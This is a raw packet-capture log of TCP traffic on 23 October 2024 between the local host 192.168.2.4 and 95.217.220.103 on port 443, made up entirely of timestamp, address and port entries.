                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.928260088 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.928267956 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.928333998 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.929152012 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.929167986 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.929219961 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.929228067 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.929256916 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.929274082 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.022254944 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.022325993 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.022411108 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.022442102 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.022475958 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.022495031 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.025834084 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.025851011 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.025924921 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.025953054 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.025996923 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.034585953 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.034601927 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.034703970 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.034732103 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.034778118 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.035661936 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.035677910 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.035748005 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.035774946 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.035790920 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.035813093 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.044529915 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.044545889 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.044637918 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.044665098 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.044729948 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.099325895 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.099347115 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.099488974 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.099518061 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.099562883 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.099636078 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.139301062 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.139326096 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.139417887 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.139441013 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.139512062 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.142385006 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.142400980 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.142477989 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.142488003 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.142534018 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.150384903 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.150402069 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.150476933 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.150496960 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.150544882 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.151365042 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.151380062 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.151451111 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.151469946 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.151531935 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.160947084 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.160964966 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.161055088 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.161082983 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.161124945 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.215943098 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.215970039 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.216078997 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.216097116 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.216160059 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.216176033 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.254683018 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.254702091 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.254791975 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.254805088 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.254884005 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283080101 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283097982 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283164024 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283179045 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283227921 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283816099 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283832073 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283895969 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283904076 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.283947945 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.285501957 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.285517931 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.285578966 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.285587072 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.285629034 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.286493063 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.286508083 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.286564112 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.286571980 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.286613941 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.287558079 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.287584066 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.287697077 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.287704945 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.287760973 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.369982958 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.370003939 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.370069027 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.370090961 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.370105028 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.370140076 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.374136925 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.374152899 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.374217987 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.374226093 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.374300003 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.414906979 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.414927006 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.415010929 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.415020943 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.415090084 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.417757034 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.417773008 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.417848110 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.417856932 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.417902946 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.418462992 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.418478966 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.418539047 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.418548107 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.418591976 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.418971062 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.418984890 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.419040918 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.419049025 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.419090033 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.447873116 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.447890997 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.447974920 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.447999954 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.448074102 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.486534119 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.486552954 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.486673117 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.486692905 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.486767054 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.490784883 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.490803003 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.490876913 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.490885973 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.490932941 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.533953905 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.533977032 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.534095049 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.534111023 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.534184933 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.534792900 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.534809113 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.534868956 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.534878969 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.534923077 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536047935 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536063910 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536122084 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536130905 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536175013 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536850929 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536868095 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536926985 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536936998 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.536981106 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.564341068 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.564362049 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.564588070 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.564623117 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.564708948 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.603072882 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.603095055 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.603137016 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.603147030 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.603262901 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.606863976 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.606889009 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.606956005 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.606975079 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.607028008 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.644855022 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.644874096 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.645122051 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.645136118 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.645211935 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.645819902 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.645833969 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.645898104 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.645905972 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.645951986 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.646795988 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.646811008 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.646888018 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.646895885 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.646945000 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.664635897 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.664654016 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.664746046 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.664758921 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.664920092 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.665493011 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.665508986 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.665572882 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.665594101 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.665647984 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.718786001 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.718803883 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.718899012 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.718918085 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.718983889 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.722867966 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.722884893 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.722948074 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.722956896 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.723001003 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.759975910 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.759994984 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.760102987 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.760116100 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.760194063 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.760787964 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.760806084 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.760868073 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.760876894 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.760925055 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.761948109 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.761964083 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.762021065 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.762029886 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.762074947 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.767797947 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.767813921 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.767894030 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.767903090 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.767950058 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.768457890 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.768480062 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.768523932 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.768532991 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.768558025 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.768583059 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.796324015 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.796340942 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.796469927 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.796489000 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.796549082 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.834908009 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.834925890 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.835055113 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.835076094 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.835155010 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.838967085 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.838987112 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.839060068 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.839070082 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.839116096 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.876497984 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.876517057 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.876589060 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.876604080 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.876651049 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.877543926 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.877561092 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.877610922 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.877620935 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.877646923 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.877656937 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.878737926 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.878753901 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:40.878803015 CEST49752443192.168.2.495.217.220.103
